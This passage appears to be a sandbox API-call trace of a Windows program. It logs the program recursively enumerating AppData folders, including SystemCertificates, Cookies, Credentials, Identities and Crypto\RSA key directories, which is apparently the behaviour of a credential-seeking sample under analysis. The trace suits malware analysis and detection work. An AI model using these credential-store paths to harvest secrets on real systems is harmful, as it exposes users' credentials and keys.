	[0102.312] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.312] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.312] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.312] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0102.312] FindClose (in: hFindFile=0x213b70 | out: hFindFile=0x213b70) returned 1
	[0102.312] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x251fe8, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 1
	[0102.312] lstrcmpiW (lpString1="CTLs", lpString2=".") returned 1
	[0102.312] lstrcmpiW (lpString1="CTLs", lpString2="..") returned 1
	[0102.313] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\SystemCertificates\\\\My\\\\CTLs\\\\*", lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b70
	[0102.313] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.313] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.313] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.313] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.313] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0102.313] FindClose (in: hFindFile=0x213b70 | out: hFindFile=0x213b70) returned 1
	[0102.313] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x251fe8, dwReserved1=0x0, cFileName="CTLs", cAlternateFileName="")) returned 0
	[0102.313] FindClose (in: hFindFile=0x213b30 | out: hFindFile=0x213b30) returned 1
	[0102.313] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xadce1b97, ftLastAccessTime.dwHighDateTime=0x1ca043c, ftLastWriteTime.dwLowDateTime=0xadce1b97, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 0
	[0102.313] FindClose (in: hFindFile=0x213af0 | out: hFindFile=0x213af0) returned 1
	[0102.313] FindNextFileW (in: hFindFile=0x213a70, lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68f8aef5, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf7d3e02f, ftLastAccessTime.dwHighDateTime=0x1cb88f5, ftLastWriteTime.dwLowDateTime=0xf7d3e02f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24ffe8, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1
	[0102.313] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1
	[0102.313] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1
	[0102.313] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\*", lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68f8aef5, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf7d3e02f, ftLastAccessTime.dwHighDateTime=0x1cb88f5, ftLastWriteTime.dwLowDateTime=0xf7d3e02f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213af0
	[0102.314] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.314] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68f8aef5, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf7d3e02f, ftLastAccessTime.dwHighDateTime=0x1cb88f5, ftLastWriteTime.dwLowDateTime=0xf7d3e02f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.314] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.314] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.314] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x68f8aef5, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xaab561a0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xaab561a0, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1
	[0102.314] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf7d3e02f, ftCreationTime.dwHighDateTime=0x1cb88f5, ftLastAccessTime.dwLowDateTime=0xf7d3e02f, ftLastAccessTime.dwHighDateTime=0x1cb88f5, ftLastWriteTime.dwLowDateTime=0xf7d3e02f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IETldCache", cAlternateFileName="IETLDC~1")) returned 1
	[0102.314] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf7d3e02f, ftCreationTime.dwHighDateTime=0x1cb88f5, ftLastAccessTime.dwLowDateTime=0xf7d3e02f, ftLastAccessTime.dwHighDateTime=0x1cb88f5, ftLastWriteTime.dwLowDateTime=0xf7d3e02f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IETldCache", cAlternateFileName="IETLDC~1")) returned 0
	[0102.314] FindClose (in: hFindFile=0x213af0 | out: hFindFile=0x213af0) returned 1
	[0102.314] FindNextFileW (in: hFindFile=0x213a70, lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68f8aef5, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf7d3e02f, ftLastAccessTime.dwHighDateTime=0x1cb88f5, ftLastWriteTime.dwLowDateTime=0xf7d3e02f, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24ffe8, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0
	[0102.314] FindClose (in: hFindFile=0x213a70 | out: hFindFile=0x213a70) returned 1
	[0102.314] FindNextFileW (in: hFindFile=0x213ab0, lpFindFileData=0x128e10 | out: lpFindFileData=0x128e10*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xadce1b97, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0x68f8aef5, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x68f8aef5, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75c5cb17, dwReserved1=0x38, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0
	[0102.314] FindClose (in: hFindFile=0x213ab0 | out: hFindFile=0x213ab0) returned 1
	[0102.314] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0xffffffff, dwFlags=0x0, pszPath=0x129090 | out: pszPath="C:\\Users\\Default\\AppData\\Roaming") returned 0x0
	[0102.319] lstrcmpiW (lpString1="C:\\Users\\Default\\AppData\\Roaming", lpString2="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned -1
	[0102.319] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\*", lpFindFileData=0x128e10 | out: lpFindFileData=0x128e10*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x128e48, dwReserved1=0x75c5c361, cFileName=".", cAlternateFileName="")) returned 0x213ab0
	[0102.319] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.319] FindNextFileW (in: hFindFile=0x213ab0, lpFindFileData=0x128e10 | out: lpFindFileData=0x128e10*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa06094d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x128e48, dwReserved1=0x75c5c361, cFileName="..", cAlternateFileName="")) returned 1
	[0102.319] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.319] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.319] FindNextFileW (in: hFindFile=0x213ab0, lpFindFileData=0x128e10 | out: lpFindFileData=0x128e10*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x128e48, dwReserved1=0x75c5c361, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1
	[0102.319] lstrcmpiW (lpString1="Identities", lpString2=".") returned 1
	[0102.319] lstrcmpiW (lpString1="Identities", lpString2="..") returned 1
	[0102.319] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Identities\\\\*", lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213a70
	[0102.320] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.320] FindNextFileW (in: hFindFile=0x213a70, lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.320] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.320] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.320] FindNextFileW (in: hFindFile=0x213a70, lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}", cAlternateFileName="{B85DC~1")) returned 1
	[0102.320] lstrcmpiW (lpString1="{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}", lpString2=".") returned 1
	[0102.320] lstrcmpiW (lpString1="{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}", lpString2="..") returned 1
	[0102.320] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Identities\\\\{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}\\\\*", lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213af0
	[0102.320] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.320] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.320] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.320] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.320] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0102.320] FindClose (in: hFindFile=0x213af0 | out: hFindFile=0x213af0) returned 1
	[0102.320] FindNextFileW (in: hFindFile=0x213a70, lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{B85DCA4A-5C21-4EC5-AF48-A2A88CD3D1D9}", cAlternateFileName="{B85DC~1")) returned 0
	[0102.320] FindClose (in: hFindFile=0x213a70 | out: hFindFile=0x213a70) returned 1
	[0102.320] FindNextFileW (in: hFindFile=0x213ab0, lpFindFileData=0x128e10 | out: lpFindFileData=0x128e10*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x128e48, dwReserved1=0x75c5c361, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1
	[0102.320] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1
	[0102.321] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1
	[0102.321] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\*", lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213a70
	[0102.327] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.327] FindNextFileW (in: hFindFile=0x213a70, lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.327] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.327] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.327] FindNextFileW (in: hFindFile=0x213a70, lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1
	[0102.327] lstrcmpiW (lpString1="Credentials", lpString2=".") returned 1
	[0102.328] lstrcmpiW (lpString1="Credentials", lpString2="..") returned 1
	[0102.328] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Credentials\\\\*", lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213af0
	[0102.328] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.328] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.328] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.328] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.328] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7bf6e58d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0102.328] FindClose (in: hFindFile=0x213af0 | out: hFindFile=0x213af0) returned 1
	[0102.328] FindNextFileW (in: hFindFile=0x213a70, lpFindFileData=0x128390 | out: lpFindFileData=0x128390*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1
	[0102.329] lstrcmpiW (lpString1="Crypto", lpString2=".") returned 1
	[0102.329] lstrcmpiW (lpString1="Crypto", lpString2="..") returned 1
	[0102.329] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Crypto\\\\*", lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213af0
	[0102.329] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.329] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.329] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.329] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.329] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1
	[0102.329] lstrcmpiW (lpString1="RSA", lpString2=".") returned 1
	[0102.329] lstrcmpiW (lpString1="RSA", lpString2="..") returned 1
	[0102.329] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Crypto\\\\RSA\\\\*", lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b30
	[0102.329] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.329] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xa0a871c0, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0a871c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.329] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.330] lstrcmpiW (lpString1="..", lpString2="..") returned 0
